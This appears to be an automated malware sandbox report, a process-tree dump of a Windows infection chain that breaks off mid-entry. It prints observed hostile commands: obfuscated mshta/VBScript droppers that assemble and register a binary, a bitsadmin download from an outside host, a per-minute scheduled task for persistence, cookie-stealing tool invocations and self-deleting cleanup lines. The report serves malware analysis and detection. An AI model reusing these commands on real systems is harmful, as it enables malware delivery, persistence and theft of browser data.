        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4736 /prefetch:8
        8⤵
        
        PID:6544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:8
        8⤵
        
        PID:632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5188 /prefetch:8
        8⤵
        
        PID:1380
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8
        8⤵
        
        PID:5792
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3772 /prefetch:8
        8⤵
        
        PID:6400
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3740 /prefetch:8
        8⤵
        
        PID:6612
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3748 /prefetch:8
        8⤵
        
        PID:5916
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3788 /prefetch:8
        8⤵
        
        PID:6956
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4052 /prefetch:8
        8⤵
        
        PID:2476
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5888 /prefetch:8
        8⤵
        
        PID:6972
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5608 /prefetch:8
        8⤵
        
        PID:6852
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3388 /prefetch:8
        8⤵
        
        PID:6952
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:8
        8⤵
        
        PID:6780
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
        8⤵
        
        PID:4704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:8
        8⤵
        
        PID:4548
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:8
        8⤵
        
        PID:5348
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5188 /prefetch:8
        8⤵
        
        PID:6532
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=724 /prefetch:8
        8⤵
        
        PID:4368
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5512 /prefetch:8
        8⤵
        
        PID:6712
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3620 /prefetch:8
        8⤵
        
        PID:6704

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3900
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:3872

C:\Users\Admin\AppData\Local\Temp\25D.exe
C:\Users\Admin\AppData\Local\Temp\25D.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3936
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im 25D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\25D.exe" & del C:\ProgramData\*.dll & exit
  2⤵
  PID:6692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im 25D.exe /f
    3⤵
    - Kills process with taskkill
    PID:6832
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    3⤵
    - Delays execution with timeout.exe
    PID:5268

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:5768
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  - Loads dropped DLL
  PID:6044

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:6208

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5824

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
1⤵
- Executes dropped EXE
PID:2484
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Videocard Service" /tr "C:\Users\Admin\AppData\Local\Temp\335C.exe" /f
  2⤵
  - Creates scheduled task(s)
  PID:6684

C:\Users\Admin\AppData\Local\Temp\3745.exe
C:\Users\Admin\AppData\Local\Temp\3745.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5292

C:\Users\Admin\AppData\Local\Temp\3C96.exe
C:\Users\Admin\AppData\Local\Temp\3C96.exe
1⤵
- Executes dropped EXE
PID:6372

C:\Users\Admin\AppData\Local\Temp\4590.exe
C:\Users\Admin\AppData\Local\Temp\4590.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:5844

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3512

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5492

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5256

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5468

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5336

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:2928

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4972

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5784

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5356

C:\Users\Admin\AppData\Local\Temp\DFFC.exe
C:\Users\Admin\AppData\Local\Temp\DFFC.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:6656
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im DFFC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DFFC.exe" & del C:\ProgramData\*.dll & exit
  2⤵
  PID:2124
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im DFFC.exe /f
    3⤵
    - Kills process with taskkill
    PID:1916
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Drops file in Drivers directory
      Adds Run key to start application
      PID:5536
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    3⤵
    - Delays execution with timeout.exe
    PID:580

C:\Users\Admin\AppData\Local\Temp\E3F5.exe
C:\Users\Admin\AppData\Local\Temp\E3F5.exe
1⤵
- Executes dropped EXE
PID:5428
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" VbsCRIPt: Close ( CREATeObjECT( "wsCRIpT.ShElL" ). RUn ( "cmd.exe /Q /c tyPE ""C:\Users\Admin\AppData\Local\Temp\E3F5.exe"" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If """" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\E3F5.exe"" ) do taskkill /Im ""%~nxE"" -F " , 0, TRue ) )
  2⤵
  PID:5940
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /Q /c tyPE "C:\Users\Admin\AppData\Local\Temp\E3F5.exe" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If "" == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\E3F5.exe" ) do taskkill /Im "%~nxE" -F
    3⤵
    PID:4572
  - - C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE
      wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t
      4⤵
      Executes dropped EXE
      PID:6380
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRIPt: Close ( CREATeObjECT( "wsCRIpT.ShElL" ). RUn ( "cmd.exe /Q /c tyPE ""C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE"" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If ""/PgRbPZTUXQ3fqTxJ5RJVzdoK5t "" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE"" ) do taskkill /Im ""%~nxE"" -F " , 0, TRue ) )
        5⤵
        
        PID:5296
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /c tyPE "C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE" > wiZC_h7~B.eXE &&STaRT wIZC_h7~B.eXe /PgRbPZTUXQ3fqTxJ5RJVzdoK5t & If "/PgRbPZTUXQ3fqTxJ5RJVzdoK5t " == "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\wiZC_h7~B.eXE" ) do taskkill /Im "%~nxE" -F
        6⤵
        
        PID:5548
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBScRIpt: clOSE ( CReatEObjecT ("WSCRipt.ShElL"). RUN( "C:\Windows\system32\cmd.exe /q /C eCHO fx46oC:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;g9q> fHUZ28V.I0 & ECho | sET /p = ""MZ"" > PD~PO.Fu& Copy /y /B PD~PO.FU + 7KUTL.Vbk + FDiJ.1V + ShUJ.ChH +fHuZ28V.I0 m9HEkzA.2 & sTArT regsvr32.exe /U -S m9HEkZA.2 " , 0, TrUE) )
        5⤵
        
        PID:3332
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /Im "E3F5.exe" -F
      4⤵
      Kills process with taskkill
      PID:6188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6204

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4316

C:\Users\Admin\AppData\Local\Temp\4158.exe
C:\Users\Admin\AppData\Local\Temp\4158.exe
1⤵
PID:7152

C:\Users\Admin\AppData\Local\Temp\42A1.exe
C:\Users\Admin\AppData\Local\Temp\42A1.exe
1⤵
PID:3696
- C:\Users\Admin\AppData\Local\Temp\is-R3P30.tmp\42A1.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-R3P30.tmp\42A1.tmp" /SL5="$402A8,172303,88576,C:\Users\Admin\AppData\Local\Temp\42A1.exe"
  2⤵
  PID:5408
- - C:\Users\Admin\AppData\Local\Temp\is-N0TI1.tmp\èeèrgegdè_éçè_)))_.exe
    "C:\Users\Admin\AppData\Local\Temp\is-N0TI1.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=rec7
    3⤵
    - Drops file in Drivers directory
    - Adds Run key to start application
    PID:6280
  - - C:\Program Files\Windows NT\TKJVUMTXEA\irecord.exe
      "C:\Program Files\Windows NT\TKJVUMTXEA\irecord.exe" /VERYSILENT
      4⤵
      PID:5024
    - - C:\Users\Admin\AppData\Local\Temp\is-Q6TKD.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-Q6TKD.tmp\irecord.tmp" /SL5="$B035C,5808768,66560,C:\Program Files\Windows NT\TKJVUMTXEA\irecord.exe" /VERYSILENT
        5⤵
        Suspicious use of FindShellTrayWindow
        
        PID:5492
      - C:\Program Files (x86)\i-record\I-Record.exe
        
        "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
        6⤵
        
        PID:2104
  - - C:\Users\Admin\AppData\Local\Temp\8e-ad8e8-967-95083-3c1a798362d3c\Xegysukinae.exe
      "C:\Users\Admin\AppData\Local\Temp\8e-ad8e8-967-95083-3c1a798362d3c\Xegysukinae.exe"
      4⤵
      Checks computer location settings
      PID:5800
  - - C:\Users\Admin\AppData\Local\Temp\a4-40e00-788-ce7b7-7b5b1111cd39c\Lojuqalequ.exe
      "C:\Users\Admin\AppData\Local\Temp\a4-40e00-788-ce7b7-7b5b1111cd39c\Lojuqalequ.exe"
      4⤵
      PID:1464
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lb5l3mzl.5wu\GcleanerEU.exe /eufive & exit
        5⤵
        
        PID:6768
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g4zkmxcg.ok2\JoSetp.exe & exit
        5⤵
        
        PID:6720
      - C:\Users\Admin\AppData\Local\Temp\g4zkmxcg.ok2\JoSetp.exe
        
        C:\Users\Admin\AppData\Local\Temp\g4zkmxcg.ok2\JoSetp.exe
        6⤵
        
        PID:7032
        
        C:\Users\Admin\AppData\Roaming\7597109.exe
        
        "C:\Users\Admin\AppData\Roaming\7597109.exe"
        7⤵
        
        PID:4104
        
        C:\Users\Admin\AppData\Roaming\5145379.exe
        
        "C:\Users\Admin\AppData\Roaming\5145379.exe"
        7⤵
        Suspicious behavior: SetClipboardViewer
        
        PID:5244
        
        C:\Users\Admin\AppData\Roaming\6009216.exe
        
        "C:\Users\Admin\AppData\Roaming\6009216.exe"
        7⤵
        
        PID:6304
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyzm0bxm.zkd\installer.exe /qn CAMPAIGN="654" & exit
        5⤵
        
        PID:5188
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe /Verysilent /subid=623 & exit
        5⤵
        
        PID:4432
      - C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe
        
        C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe /Verysilent /subid=623
        6⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\is-T7PVC.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-T7PVC.tmp\Setup3310.tmp" /SL5="$10474,138429,56832,C:\Users\Admin\AppData\Local\Temp\yqyss2ce.da2\Setup3310.exe" /Verysilent /subid=623
        7⤵
        Suspicious use of FindShellTrayWindow
        
        PID:6780
        
        C:\Users\Admin\AppData\Local\Temp\is-5RQPJ.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-5RQPJ.tmp\Setup.exe" /Verysilent
        8⤵
        
        PID:5884
        
        C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
        9⤵
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        10⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        10⤵
        
        PID:7996
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        10⤵
        
        PID:6708
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        10⤵
        
        PID:9164
        
        C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe
        
        "C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
        9⤵
        
        PID:6788
        
        C:\Users\Admin\AppData\Local\Temp\is-SMTP2.tmp\MediaBurner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-SMTP2.tmp\MediaBurner.tmp" /SL5="$3050A,303887,220160,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
        10⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\is-QNCOS.tmp\_____________bob.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-QNCOS.tmp\_____________bob.exe" /S /UID=burnerch1
        11⤵
        Drops file in Drivers directory
        Adds Run key to start application
        
        PID:6936
        
        C:\Program Files\Windows Security\ZVIOSTQMHV\ultramediaburner.exe
        
        "C:\Program Files\Windows Security\ZVIOSTQMHV\ultramediaburner.exe" /VERYSILENT
        12⤵
        
        PID:7436
        
        C:\Users\Admin\AppData\Local\Temp\is-CPU77.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CPU77.tmp\ultramediaburner.tmp" /SL5="$30584,281924,62464,C:\Program Files\Windows Security\ZVIOSTQMHV\ultramediaburner.exe" /VERYSILENT
        13⤵
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:7504
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        14⤵
        
        PID:7692
        
        C:\Users\Admin\AppData\Local\Temp\96-cdcd3-65f-70b91-bf69ee21f36d9\Fikumigaena.exe
        
        "C:\Users\Admin\AppData\Local\Temp\96-cdcd3-65f-70b91-bf69ee21f36d9\Fikumigaena.exe"
        12⤵
        Checks computer location settings
        
        PID:7476
        
        C:\Users\Admin\AppData\Local\Temp\68-8b475-f52-2e1b1-5c4e2571c1280\Qomikaekuqy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\68-8b475-f52-2e1b1-5c4e2571c1280\Qomikaekuqy.exe"
        12⤵
        
        PID:7576
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\obhd0sxq.uj5\GcleanerEU.exe /eufive & exit
        13⤵
        
        PID:1220
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3isgf5zv.5q2\installer.exe /qn CAMPAIGN="654" & exit
        13⤵
        
        PID:3816
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe /Verysilent /subid=623 & exit
        13⤵
        
        PID:9020
        
        C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe
        
        C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe /Verysilent /subid=623
        14⤵
        
        PID:808
        
        C:\Users\Admin\AppData\Local\Temp\is-8USGP.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8USGP.tmp\Setup3310.tmp" /SL5="$30440,138429,56832,C:\Users\Admin\AppData\Local\Temp\0abmzj35.vpe\Setup3310.exe" /Verysilent /subid=623
        15⤵
        Suspicious use of FindShellTrayWindow
        
        PID:8196
        
        C:\Users\Admin\AppData\Local\Temp\is-74D8F.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-74D8F.tmp\Setup.exe" /Verysilent
        16⤵
        
        PID:2792
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe & exit
        13⤵
        
        PID:7348
        
        C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe
        14⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1455qozo.fxe\google-game.exe" -a
        15⤵
        
        PID:8680
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe & exit
        13⤵
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe
        14⤵
        Suspicious use of SetThreadContext
        
        PID:8764
        
        C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\ajy04tyo.ce0\toolspab1.exe
        15⤵
        
        PID:7128
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\14s4xsrx.0yo\SunLabsPlayer.exe /S & exit
        13⤵
        
        PID:8444
        
        C:\Users\Admin\AppData\Local\Temp\14s4xsrx.0yo\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\14s4xsrx.0yo\SunLabsPlayer.exe /S
        14⤵
        Drops file in Program Files directory
        
        PID:8932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:7456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:8412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:8736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:8964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:9160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:8680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        Checks for any installed AV software in registry
        
        PID:8876
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
        15⤵
        Download via BitsAdmin
        
        PID:3936
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        15⤵
        
        PID:4500
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        15⤵
        
        PID:7336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:9080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
        15⤵
        
        PID:2844
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:6168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
